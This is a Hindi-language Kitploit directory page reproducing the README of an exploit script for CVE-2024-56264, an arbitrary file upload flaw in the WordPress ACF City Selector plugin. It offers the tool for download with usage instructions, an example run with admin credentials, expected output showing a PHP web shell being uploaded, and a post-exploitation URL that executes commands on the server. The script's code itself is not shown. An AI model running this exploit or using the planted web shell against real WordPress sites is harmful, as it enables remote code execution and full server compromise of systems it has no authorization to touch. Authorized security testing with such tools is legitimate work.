Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-56264 | Kitploit
उपकरण/GitHubGitHub/dpakmrya/cve-2024-56264
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-56264

WordPress ACF City Selector - मनमाना फ़ाइल अपलोड एक्सप्लॉइट (CVE-2024-56264)

अवलोकन

यह रिपॉज़िटरी CVE-2024-56264 के लिए एक एक्सप्लॉइट है, जो WordPress ACF City Selector प्लगइन (संस्करण <= 1.14.0) में पाई गई मनमाना फ़ाइल अपलोड भेद्यता है। यह भेद्यता एक हमलावर को एक कमज़ोर WordPress इंस्टेंस पर दुर्भावनापूर्ण PHP फ़ाइल (वेब शेल) अपलोड करने और सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

CVE विवरण

  • CVE ID: CVE-2024-56264
  • प्रकाशन तिथि: 2 जनवरी, 2025
  • प्रभावित प्लगइन: ACF City Selector
  • असुरक्षित संस्करण: <= 1.14.0
  • प्रभाव: असीमित फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन (RCE)

विवरण

ACF City Selector प्लगइन अपलोड की गई फ़ाइलों का ठीक से सत्यापन नहीं करता है, जिससे हमलावर प्रतिबंधों को बायपास कर सकते हैं और मनमानी PHP फ़ाइलें अपलोड कर सकते हैं। एक बार दुर्भावनापूर्ण PHP फ़ाइल अपलोड हो जाने पर, हमलावर दूरस्थ रूप से सिस्टम कमांड निष्पादित कर सकता है, जिससे पूर्ण सर्वर सेंध हो जाती है।

आवश्यकताएँ

📌 निर्भरताएँ

स्क्रिप्ट चलाने से पहले सुनिश्चित करें कि निम्नलिखित स्थापित हैं:

  • Python 3.x
  • requests मॉड्यूल (स्थापित करने के लिए: pip install requests)

आप सभी आवश्यक निर्भरताएँ निम्न का उपयोग करके स्थापित कर सकते हैं:

root@kitploit:~
pip install -r requirements.txt

🚀 उपयोग

एक्सप्लॉइट चलाना:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

उदाहरण:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

अपेक्षित आउटपुट

सफल शोषण के बाद, आपको यह देखना चाहिए:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

शोषण के बाद (Post-Exploitation)

सफल होने पर, अपलोड किए गए शेल तक निम्न के माध्यम से पहुँचें:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

यह सर्वर पर रिमोट कमांड निष्पादन की अनुमति देता है।

⚠ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है और इसके गंभीर परिणाम हो सकते हैं। लेखक इस एक्सप्लॉइट के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें